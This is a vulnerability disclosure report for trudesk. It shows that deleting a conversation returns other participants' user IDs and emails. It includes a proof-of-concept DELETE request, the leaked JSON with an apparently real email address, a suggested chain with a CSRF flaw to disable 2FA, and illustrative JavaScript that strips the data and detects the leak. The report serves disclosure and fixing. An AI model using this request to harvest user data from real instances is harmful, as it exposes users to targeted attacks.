Exposure of Sensitive Information to an Unauthorized Actor in polonel/trudesk
Reported on
Dec 31st 2021
Description
When you delete a conversation, the server responds with sensitive data including user IDs and emails among other data. The endpoint that's contacted in order to delete a conversation is /api/v1/messages/conversation/<conversation ID>.
A user with low level privileges (such as a customer account) could delete a conversation with an admin or support user in order to gather sensitive data on them (such as their email and user ID).
Proof of Concept
Request to delete a conversation:
DELETE /api/v1/messages/conversation/61cbd4e1ce4a7b08a27da13d HTTP/1.1
Host: docker.trudesk.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Origin: https://docker.trudesk.io
DNT: 1
Connection: keep-alive
Referer: https://docker.trudesk.io/messages/61cbd4e1ce4a7b08a27da13d
Cookie: connect.sid=s%3A31gkqni9Vf8BD36ANQ7gKXaqrXC7kB5o.%2Fxp0Y6uSTTPs0mRElGQX7DgfBvjTgY8TLaQKI5VbsoM; $trudesk%3Atimezone=America/New_York; io=XohJgk5RuPIxqanVAAzL
Sec-GPC: 1
After a conversation is deleted, the server responds with this data:
{
  "success": true,
  "conversation": {
    "participants": [
      {
        "_id": "61c8238fce4a7b08a27da00d",
        "username": "customer.demo",
        "email": "turnonit@gmail.com",
        "fullname": "Client",
        "title": "Client",
        "role": {
          "_id": "5c860277e518a8003458fae7",
          "name": "User",
          "description": "Default role for users",
          "normalized": "user",
          "isAdmin": false,
          "isAgent": false,
          "id": "5c860277e518a8003458fae7"
        },
        "lastOnline": "2021-12-26T08:12:37.037Z"
      },
      {
        "_id": "5ba4104e5b2b5a00605e95a2",
        "username": "demo.user",
        "fullname": "Demo User",
        "email": "demo.admin@trudesk.io",
        "role": {
          "_id": "5c860277e518a8003458fae9",
          "name": "Admin",
          "description": "Default role for admins",
          "normalized": "admin",
          "isAdmin": true,
          "isAgent": true,
          "id": "5c860277e518a8003458fae9"
        },
        "title": "Demo Admin",
        "lastOnline": "2021-12-26T08:02:59.342Z"
      }
    ],
    "_id": "61c823ebce4a7b08a27da00e",
    "userMeta": [
      {
        "userId": "61c8238fce4a7b08a27da00d",
        "joinedAt": "2021-12-26T08:12:27.015Z",
        "createdAt": "2021-12-26T08:12:27.022Z",
        "updatedAt": "2021-12-26T08:12:55.266Z",
        "deletedAt": "2021-12-26T08:12:55.264Z"
      },
      {
        "userId": "5ba4104e5b2b5a00605e95a2",
        "joinedAt": "2021-12-26T08:12:27.015Z",
        "lastRead": "2021-12-26T08:12:27.015Z",
        "createdAt": "2021-12-26T08:12:27.022Z",
        "updatedAt": "2021-12-26T08:12:27.022Z"
      }
    ],
    "updatedAt": "2021-12-26T08:12:44.650Z",
    "createdAt": "2021-12-26T08:12:27.018Z",
    "__v": 0
  }
}
Impact
Since this leaks sensitive information, an attacker can use this information in another attack. For example, since it leaks the user ID, the attacker can take this piece of data and perform a CSRF attack in order to disable the victim's 2FA code (a CSRF vulnerability which I pointed out here: https://huntr.dev/bounties/edit/af3ecce4-840f-445e-98d0-11557cd8de1f/)
Occurrences
messages.js L311
After a conversation is successfully deleted, the sConvo variable is returned, which contains all the metadata of the conversation, including sensitive data (such as user IDs). This metadata should be stripped prior to it being returned to the user when they delete a conversation in order to prevent information leakage.
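As an added illustration (not trudesk's own code), the leaky response pattern described above beside a stripped response, plus a small walker that lists which fields of a response body identify other users. The conversation object, the function names and the walker are constructed for this example; only the ids are taken from the report, and the e-mail addresses are placeholders.

```javascript
// Constructed conversation document mirroring the shape of the response in
// the report (ids from the report, e-mail addresses replaced with placeholders).
const sConvo = {
  _id: '61c823ebce4a7b08a27da00e',
  participants: [
    { _id: '61c8238fce4a7b08a27da00d', username: 'customer.demo', email: 'customer@example.invalid',
      role: { _id: '5c860277e518a8003458fae7', name: 'User', isAdmin: false }, lastOnline: '2021-12-26T08:12:37.037Z' },
    { _id: '5ba4104e5b2b5a00605e95a2', username: 'demo.user', email: 'admin@example.invalid',
      role: { _id: '5c860277e518a8003458fae9', name: 'Admin', isAdmin: true }, lastOnline: '2021-12-26T08:02:59.342Z' },
  ],
  userMeta: [
    { userId: '61c8238fce4a7b08a27da00d', deletedAt: '2021-12-26T08:12:55.264Z' },
    { userId: '5ba4104e5b2b5a00605e95a2', lastRead: '2021-12-26T08:12:27.015Z' },
  ],
  createdAt: '2021-12-26T08:12:27.018Z',
  __v: 0,
};

// The pattern the report describes: the whole document is echoed back to the caller.
function deleteResponseLeaky(convo) {
  return { success: true, conversation: convo };
}

// Stripped response: the client only needs to know which conversation is gone,
// so nothing about the other participants is sent back.
function deleteResponseStripped(convo) {
  return { success: true, conversation: { _id: String(convo._id) } };
}

// Walks a response body and returns the paths of fields that identify other
// users: e-mail addresses and user ids (`userId` entries in userMeta and
// `_id` entries directly under participants). Role ids are not user ids.
function findLeakedUserData(value, path = '') {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((item, i) => hits.push(...findLeakedUserData(item, `${path}[${i}]`)));
  } else if (value && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      const p = path ? `${path}.${key}` : key;
      const isUserId = key === 'userId' || (key === '_id' && /participants\[\d+\]$/.test(path));
      if (key === 'email' || isUserId) hits.push(p);
      else hits.push(...findLeakedUserData(child, p));
    }
  }
  return hits;
}

console.log('leaky:', findLeakedUserData(deleteResponseLeaky(sConvo)));
console.log('stripped:', findLeakedUserData(deleteResponseStripped(sConvo)));
```

Running the walker over the leaky response lists both participants' e-mail addresses and all four user id fields; over the stripped response it lists nothing.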
This has been fixed in v1.2.2. I will update this report once it is released.